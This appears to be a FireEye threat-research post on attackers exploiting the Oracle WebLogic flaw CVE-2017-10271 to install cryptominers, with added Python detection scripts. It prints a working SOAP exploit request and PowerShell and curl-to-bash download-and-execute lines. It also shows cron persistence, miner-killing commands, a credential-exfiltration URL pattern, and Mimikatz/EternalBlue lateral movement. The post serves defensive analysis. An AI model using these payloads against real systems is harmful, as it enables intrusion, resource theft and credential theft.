Introduction

FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency 
miners. 

CVE-2017-10271 is a known input validation vulnerability in the WebLogic Server Security Service (WLS Security) component of Oracle WebLogic Server versions 12.2.1.2.0 and prior. An unauthenticated attacker can exploit it to remotely execute arbitrary code. Oracle fixed the vulnerability in its October 2017 Critical Patch Update. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public 
posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download 
cryptocurrency miners in victim environments. 

We saw evidence of organizations located in various countries - including the United States, Australia, Hong Kong, 
United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical - being impacted 
by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than 
specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests 
that the external targeting calculus of these attacks is indiscriminate in nature. 

The recent cryptocurrency boom has resulted in a growing number of operations, employing diverse tactics, aimed at stealing cryptocurrencies. The perception that cryptocurrency mining operations carry less risk, along with their potentially substantial profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server 

Some tactics we've observed involve exploiting CVE-2017-10271 with a request whose WorkContext SOAP header is handed to java.beans.XMLDecoder. The decoded object graph builds a java.lang.ProcessBuilder that runs PowerShell to download the miner directly onto the victim's system (Figure 1) and then executes it using ShellExecute().


Source: https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html
CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining (page captured 3/7/2018)


Connection: keep-alive
Content-Type: text/xml
Content-Length: 500

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8.0_131" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>powershell</string>
            </void>
            <void index="1">
              <string>-command</string>
            </void>
            <void index="2">
              <string>(New-Object System.Net.WebClient).DownloadFile('http://<redacted>/cranberry.exe','logic.exe');(New-Object -com Shell.Application).ShellExecute('logic.exe');</string>
            </void>
          </array>
          <void method="start"/></void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>


Figure 1: Downloading the payload directly 

Tactic #2: Utilizing PowerShell scripts to deliver the miner 

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly 
(Figure 2). 


<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>powershell IEX (New-Object Net.WebClient).DownloadString('http://<redacted>:8220/1.ps1')</string>
    </void>
  </array>
  <void method="start"/></void>


Figure 2: Exploit delivering PowerShell script 
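The following Python script is an added example, not code from the FireEye post or from the attackers' tooling. It inspects a SOAP request body for the pattern common to Figure 1 and Figure 2: a WorkContext header carrying a java.beans.XMLDecoder object graph that instantiates java.lang.ProcessBuilder, and it pulls out the argv the server would run. This is the check a WAF rule or a log-review script needs to make. The sample request is constructed to match the shape of Figure 1 with a placeholder host; the set of dangerous classes is an assumption (ProcessBuilder is what both figures use, java.lang.Runtime is the obvious sibling).

```python
import xml.etree.ElementTree as ET

# Namespaces seen in the Figure 1 request. The WorkContext header is the part
# of the envelope WebLogic hands to java.beans.XMLDecoder.
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORK_NS = "http://bea.com/2004/06/soap/workarea/"

# Classes that have no business in a WorkContext object graph (assumption:
# ProcessBuilder from the figures, Runtime added as the obvious sibling).
DANGEROUS_CLASSES = {"java.lang.ProcessBuilder", "java.lang.Runtime"}

# Constructed request body mirroring Figure 1; attacker.example is a placeholder.
SAMPLE_REQUEST = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8.0_131" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0"><string>powershell</string></void>
            <void index="1"><string>-command</string></void>
            <void index="2"><string>(New-Object System.Net.WebClient).DownloadFile('http://attacker.example/cranberry.exe','logic.exe');(New-Object -com Shell.Application).ShellExecute('logic.exe');</string></void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>"""

# Constructed benign request: an ordinary SOAP call with no WorkContext header.
BENIGN_REQUEST = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body><getStatus/></soapenv:Body>
</soapenv:Envelope>"""


def inspect_soap_body(body):
    """Classify one request body and return the evidence found as a dict."""
    verdict = {"workcontext": False, "xmldecoder": False,
               "classes": [], "commands": [], "malicious": False}
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return verdict  # not XML at all; leave it to other checks
    verdict["workcontext"] = root.find(".//{%s}WorkContext" % WORK_NS) is not None
    for java in root.iter("java"):
        if java.get("class") != "java.beans.XMLDecoder":
            continue
        verdict["xmldecoder"] = True
        for void in java.iter("void"):
            cls = void.get("class")
            if cls in DANGEROUS_CLASSES:
                verdict["classes"].append(cls)
                # The argv lives in <string> elements under the <array>; every
                # descendant <string> of this <void> reconstructs the command line.
                verdict["commands"].append([s.text or "" for s in void.iter("string")])
    verdict["malicious"] = verdict["xmldecoder"] and bool(verdict["classes"])
    return verdict


if __name__ == "__main__":
    for name, body in (("sample", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        v = inspect_soap_body(body)
        print(name, "malicious" if v["malicious"] else "clean", v["commands"])
```

On the wire this payload arrives in POSTs to the wls-wsat component (the publicly posted proof of concept targets /wls-wsat/CoordinatorPortType), and the object graph sits in the SOAP header rather than the body, so any inspection has to parse the whole envelope instead of the Body element alone. Keying on the XMLDecoder-plus-ProcessBuilder combination rather than on the word "powershell" also catches the Linux variant in Figure 10, which only swaps the argv for /bin/bash.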


The 1.ps1 script delivered in Figure 2 has the following functionalities:

• Downloading miners from remote servers 
$noutput = "$env:TMP\yam.exe"
$vc = New-Object System.Net.WebClient
$vc.DownloadFile($nurl, $noutput)
copy $ne $HOME\SchTask.ps1
copy $env:TMP\yam.exe $env:TMP\xe.exe


Figure 3: Downloading cryptominers 

As shown in Figure 3, the .ps1 script downloads the payload from the remote server onto the compromised server and stages copies of it (SchTask.ps1 in the user's home directory and xe.exe in %TMP%) for the persistence steps that follow.

• Creating scheduled tasks for persistence 


SchTasks.exe /Create /SC MINUTE /TN "Update service for Oracle products1" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit -File $HOME\SchTask1.ps1" /MO 6 /F


Figure 4: Creation of scheduled task 


• Deleting scheduled tasks of other known cryptominers 


SchTasks.exe /Create /SC MINUTE /TN "Update service for Oracle productsa" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit -File $HOME\SchTask1.ps1" /MO 6 /F
SchTasks.exe /Delete /TN "Update service for Oracle products" /F
SchTasks.exe /Delete /TN "Update service for Oracle products1" /F
SchTasks.exe /Delete /TN "Update service for Oracle products3" /F
[seven further SchTasks.exe /Delete /TN "Update service for Oracle products<suffix>" /F lines; the single-character suffixes are not legible in the extracted figure]


Figure 5: Deletion of scheduled tasks related to other miners 


In Figure 4, the cryptominer creates a scheduled task named "Update service for Oracle products1" that launches a hidden PowerShell instance every six minutes. In Figure 5, a different variant first creates its own task, "Update service for Oracle productsa", and then deletes the products1 task along with other similarly named ones.

From this, it is quite clear that different attackers are fighting over the resources available on the system.

• Killing processes matching certain strings associated with other cryptominers 
cmd.exe /C taskkill /IM xmrig.exe /f
cmd.exe /C taskkill /IM nscpucnminer32.exe /f
cmd.exe /C taskkill /IM Ie.exe /f
cmd.exe /C taskkill /IM iie.exe /f
cmd.exe /C taskkill /IM 3.exe /f
cmd.exe /C taskkill /IM iee.exe /f
cmd.exe /C taskkill /IM ie.exe /f
cmd.exe /C taskkill /IM je.exe /f
cmd.exe /C taskkill /IM ie.exe /f
cmd.exe /C taskkill /IM iexplorer.exe /f


Figure 6: Terminating processes directly


$counters = (Get-Counter '\Process(*)\% Processor Time').CounterSamples
$malwares = 'Silence','Carbon','nscpucnminer64','mrservicehost','servisce','miner64','thunderplatform','xmrig32','cpuminer','minergate'
foreach ($counter in $counters) {
    if ($counter.CookedValue -ge 50) {
        if ($counter.InstanceName -eq 'idle' -Or $counter.InstanceName -eq '_total') {
            continue
        }
        foreach ($malware in $malwares) {
            if ($counter.InstanceName -eq $malware) {
                Stop-Process -processname $counter.InstanceName -Force
            }
        }
    }
}


Figure 7: Terminating processes matching certain strings 


Similar to the scheduled task deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

• Connects to mining pools with wallet key 



Figure 8: Connection to mining pools 


The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for the hashing algorithm, -k to send keepalive packets so the pool connection does not time out, -o for the URL of the mining pool, -u for the wallet address that serves as the pool username, -p for the pool password, and -t for limiting the number of miner threads.

• Limiting CPU usage to avoid suspicion 


cmd.exe /c $env:programdata\spoosvc.exe -o pool.supportxmr.com -u <wallet redacted> -p n -k -B --donate-level=1





Figure 9: Limiting CPU Usage 
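As an added example, not code from the FireEye post, the Python below classifies Windows process command lines for the behaviours shown in Figures 4 to 9: a scheduled task whose action is a hidden PowerShell (-ExecutionPolicy bypass, -windowstyle hidden), a schtasks /Delete against a rival's task, a taskkill of a known miner image, and a miner launch recognised by its -o pool and -u wallet flags rather than by image name (the Figure 9 miner is renamed spoosvc.exe, so image-name matching alone misses it). The command lines are constructed to resemble the figures; the pool port, the wallet placeholder and the Monero address shape check are assumptions of this example.

```python
import re

# Tokenizer that keeps quoted arguments (task names, /TR actions) in one piece.
TOKEN_RE = re.compile(r'"[^"]*"|\S+')

# Miner image names taken from the taskkill list in Figure 6 (64-bit twin added).
KNOWN_MINER_IMAGES = {"xmrig.exe", "nscpucnminer32.exe", "nscpucnminer64.exe"}

# PowerShell switches the Figure 4/5 task actions use to stay out of sight.
STEALTH_PS_RE = re.compile(
    r"-(executionpolicy\s+bypass|windowstyle\s+hidden|w\s+hidden|nop\b)", re.I)

# Monero address shape (95 base58 chars, leading 4 or 8): an assumption used only
# to score the -u value, since the page redacts the real wallet.
XMR_ADDRESS_RE = re.compile(r"[48][1-9A-HJ-NP-Za-km-z]{94}")

# Constructed command lines resembling Figures 4, 5, 6 and 9, plus two benign ones.
SAMPLE_CMDLINES = [
    'SchTasks.exe /Create /SC MINUTE /TN "Update service for Oracle products1" '
    '/TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit '
    '-File C:\\Users\\svc\\SchTask1.ps1" /MO 6 /F',
    'SchTasks.exe /Delete /TN "Update service for Oracle products" /F',
    'cmd.exe /C taskkill /IM xmrig.exe /f',
    'cmd.exe /c C:\\ProgramData\\spoosvc.exe -o pool.supportxmr.com:3333 -u '
    + "4" + "A" * 94 + ' -p x -k -B --donate-level=1 -t 2',
    'SchTasks.exe /Create /SC DAILY /TN "Nightly backup" /TR "C:\\Tools\\backup.exe /full" /F',
    'powershell.exe -File C:\\Scripts\\inventory.ps1',
]


def tokenize(cmdline):
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def _value_after(tokens, flag):
    """Argument following a /opt or -opt flag (case-insensitive), else None."""
    low = [t.lower() for t in tokens]
    if flag.lower() in low:
        i = low.index(flag.lower())
        if i + 1 < len(tokens):
            return tokens[i + 1]
    return None


def classify(cmdline):
    """Return {'tags': [...], 'details': {...}} for one process command line."""
    toks = tokenize(cmdline)
    # Unwrap "cmd.exe /c <command>" so the real image sits at position 0.
    if len(toks) > 2 and toks[0].lower() in ("cmd", "cmd.exe") and toks[1].lower() in ("/c", "/k"):
        toks = toks[2:]
    low = [t.lower() for t in toks]
    image = low[0].rsplit("\\", 1)[-1] if low else ""
    tags, details = [], {}

    if image in ("schtasks", "schtasks.exe"):
        details["task_name"] = _value_after(toks, "/tn")
        if "/create" in low:
            action = _value_after(toks, "/tr") or ""
            details.update(schedule=_value_after(toks, "/sc"),
                           modifier=_value_after(toks, "/mo"), action=action)
            if "powershell" in action.lower() and STEALTH_PS_RE.search(action):
                tags.append("hidden_powershell_task")
        if "/delete" in low:
            tags.append("task_deleted")

    if image in ("taskkill", "taskkill.exe"):
        target = (_value_after(toks, "/im") or "").lower()
        details["target"] = target
        tags.append("process_kill")
        if target in KNOWN_MINER_IMAGES:
            tags.append("miner_kill")

    # Miner launch: pool URL plus wallet, regardless of what the binary is called.
    pool, user = _value_after(toks, "-o"), _value_after(toks, "-u")
    if pool and user is not None:
        tags.append("miner_exec")
        donate = next((t for t in toks if t.lower().startswith("--donate-level")), None)
        details.update(pool=pool, wallet=user, threads=_value_after(toks, "-t"),
                       donate_level=donate,
                       wallet_looks_like_monero=bool(XMR_ADDRESS_RE.fullmatch(user)))
    return {"tags": tags, "details": details}


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(classify(line)["tags"], line[:70])
```

Run over Sysmon event 1 or 4688 command lines, a hidden_powershell_task followed minutes later by process_kill events against miner images and a miner_exec from an unexpected path is the whole Figure 4 to Figure 9 sequence; the task name alone is a weak signal because, as Figure 5 shows, rival variants reuse the same "Update service for Oracle products" prefix.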
Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and 
the EternalBlue vulnerability (CVE-2017-0144). 

The malware checks whether it is running on a 32-bit or 64-bit system to determine which PowerShell script to fetch from the command and control (C2) server. It then looks at every network adapter and aggregates the destination IPs of all established, non-loopback connections. Each IP address is tested with the extracted credentials, and a credential-based remote PowerShell execution is attempted that downloads and runs the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware can also perform a Pass-the-Hash attack with the NTLM hashes obtained from Mimikatz in order to download and execute the malware on remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to:
'http://<C2>:8000/api.php?data=<credential data>'.

If lateral movement with credentials fails, the malware uses the PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to check whether that host is vulnerable to EternalBlue, and if so uses the exploit to spread to it.

After all network-derived IPs have been processed, the malware generates random IP addresses and applies the same PingCastle-then-EternalBlue combination to each of them.

Tactic #4: Scenarios observed in Linux OS 

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality 
similar to the PowerShell scripts. 
<array class="java.lang.String" length="3">
  <void index="0">
    <string>/bin/bash</string>
  </void>
  <void index="1">
    <string>-c</string>
  </void>
  <void index="2">
    <string>curl http://<redacted>/css/lower.css |bash</string>
  </void>
</array>
<void method="start"/></void>
</java>


Figure 10: Delivery of shell scripts 


The shell script performs the following activities: 

• Attempts to kill already running cryptominers 


pkill -f cpuloadtest
pkill -f crypto-pool
pkill -f xmr
pkill -f prohash
pkill -f monero
pkill -f miner
pkill -f nanopool
pkill -f minergate
pkill -f yam
pkill -f Silence
pkill -f yam2
pkill -f minerd
pkill -f Circle_MI.png
pkill -f curl

ps auxf | grep -v grep | grep "mine-moneropool.com" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep crypto-pool | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep prohash | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep monero | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep miner | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nanopool | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep minergate | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xmr.crypto-pool.fr:3080 | awk '{print $2}' | xargs kill -9


Figure 11: Terminating processes matching certain strings 


• Downloads and executes cryptominer malware 
        wget -P /tmp/ http://<redacted>/css/initsyslog
        [curl fallback to the same URL; not fully legible in the extracted figure]
        chmod +x /tmp/initsyslog
        rm -rf /tmp/initsyslog.*
    fi
    /tmp/initsyslog &
else
    p=$(ps aux | grep initsyslog | grep -v grep | wc -l)
    if [ ${p} -eq 1 ]; then
        echo "initsyslog"
    elif [ ${p} -eq 0 ]; then
        /tmp/initsyslog &
    else
        echo ""
    fi
fi


Figure 12: Downloading CryptoMiner 


• Creates a cron job to maintain persistence 


CRON () {
    if [ -x /usr/bin/wget ]; then
        echo "*/8 * * * * wget -q -O - $HOST/robots.txt|bash" > /tmp/.$LFILE_NAME.cron
    elif [ -x /usr/bin/curl ]; then
        echo "*/8 * * * * curl $HOST/robots.txt | bash" > /tmp/.$LFILE_NAME.cron
    else
        exit 0;
    fi

    crontab -r
    crontab /tmp/.$LFILE_NAME.cron
    rm /tmp/.$LFILE_NAME.cron
}


Figure 13: Cron job for persistence 


• Tries to kill other potential miners to hog the CPU usage 


function kills () {
    /bin/ps exf -o "pid %cpu command" | grep -v initsyslog | awk '{if ($2>60.0) print $1}' | while read procid
    do
        kill -9 $procid
    done
}


Figure 14: Terminating other potential miners 


The function shown in Figure 14 finds processes consuming more than 60% CPU, excluding the miner's own initsyslog, and terminates them. This removes competing miners and maximizes the resources left for the attacker's miner, but it is indiscriminate: any busy legitimate process, including the WebLogic JVM on the compromised server, is killed as well, which makes unexplained terminations of high-load processes a useful triage clue.
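The next Python block is an added example, not part of the FireEye post, covering the Linux side of the same triage. It flags crontab entries that pipe a wget or curl download into a shell, the persistence shape in Figure 13, and lists processes above the 60% CPU threshold the Figure 14 loop uses, marking those whose command line matches a name from the Figure 11 kill list or the initsyslog binary from Figure 12. The crontab and ps output are constructed; the threshold and the hint list come from the figures.

```python
import re

# Process-name fragments from the Figure 11 kill list plus the Figure 12 binary.
MINER_HINT_RE = re.compile(
    r"xmrig|minerd|miner|minergate|nanopool|crypto-pool|moneropool|monero|xmr|"
    r"prohash|cpuminer|initsyslog", re.I)

# "Fetch something over HTTP and feed it to a shell", as in the Figure 13 cron lines.
PIPE_TO_SHELL_RE = re.compile(r"\b(wget|curl)\b[^|;]*\|\s*(ba)?sh\b", re.I)
URL_RE = re.compile(r"https?://[^\s|;]+")

# Constructed crontab: two legitimate entries around the two Figure 13 shapes.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/8 * * * * wget -q -O - http://198.51.100.9/robots.txt|bash
*/8 * * * * curl http://198.51.100.9/robots.txt | bash
@reboot /opt/app/start.sh
"""

# Constructed output of: ps -eo pid,%cpu,command
SAMPLE_PS = """\
  PID %CPU COMMAND
    1  0.0 /sbin/init
  842  0.3 /usr/sbin/sshd -D
 3120 97.5 /tmp/initsyslog
 3301 61.2 ./xmrig -o xmr.crypto-pool.fr:3080 -u 4AAAA -p x
 4002 12.0 java -jar app.jar
"""


def suspicious_cron_entries(crontab_text):
    """Return cron entries whose command downloads and pipes into a shell."""
    hits = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):            # @reboot, @hourly, ... forms
            parts = line.split(None, 1)
            schedule, command = parts[0], parts[1] if len(parts) > 1 else ""
        else:                               # m h dom mon dow command
            parts = line.split(None, 5)
            schedule = " ".join(parts[:5])
            command = parts[5] if len(parts) > 5 else ""
        if PIPE_TO_SHELL_RE.search(command):
            url = URL_RE.search(command)
            hits.append({"schedule": schedule, "command": command,
                         "url": url.group(0) if url else None})
    return hits


def high_cpu_processes(ps_text, threshold=60.0):
    """Parse `ps -eo pid,%cpu,command` output; return processes above threshold."""
    procs = []
    for line in ps_text.splitlines()[1:]:   # skip the header row
        fields = line.split(None, 2)
        if len(fields) < 3:
            continue
        pid, cpu, command = int(fields[0]), float(fields[1]), fields[2]
        if cpu > threshold:                 # same strict comparison as Figure 14
            procs.append({"pid": pid, "cpu": cpu, "command": command,
                          "miner_hint": bool(MINER_HINT_RE.search(command))})
    return procs


if __name__ == "__main__":
    for hit in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("cron:", hit["schedule"], hit["url"])
    for proc in high_cpu_processes(SAMPLE_PS):
        print("cpu:", proc["pid"], proc["cpu"], proc["command"], proc["miner_hint"])
```

Because the Figure 13 routine runs crontab -r before installing its own file, a server whose legitimate cron entries have vanished and been replaced by a single eight-minute download-and-pipe line is itself a strong indicator, even before the fetched content is recovered.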

Conclusion 

Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make 
money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential 
profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner, so that cyber criminals maximize their reach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats 
at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner 
tries to connect to mining pools. 

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name
• POWERSHELL DOWNLOADER (METHODOLOGY)
• MONERO MINER (METHODOLOGY)
• MIMIKATZ (CREDENTIAL STEALER)


Indicators of Compromise

MD5                               Name
3421A769308D39D4E9C7E8CAECAF7FC4  cranberry.exe/logic.exe
B3A831BFA590274902C77B6C7D4C31AE  xmrig.exe/yam.exe
26404FEDE71F3F713175A3A3CEBC619B  1.ps1
D3D10FAA69A10AC754E3B7DDE9178C22  2.ps1
9C91B5CF6ECED54ABB82D1050C5893F2  info3.ps1
3AAD3FABF29F9DF65DCBD0F308FF0FA8  info6.ps1
933633F2ACFC5909C83F5C73B6FC97CC  lower.css
B47DAF937897043745DF81F32B9D7565  lib.css
Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

This entry was posted on Thu Feb 15 11:30 EST 2018 and filed under Kimberly Goody, Malware, Akhil Reddy, cryptocurrency, cryptocurrency mining, and Rakesh Sharma.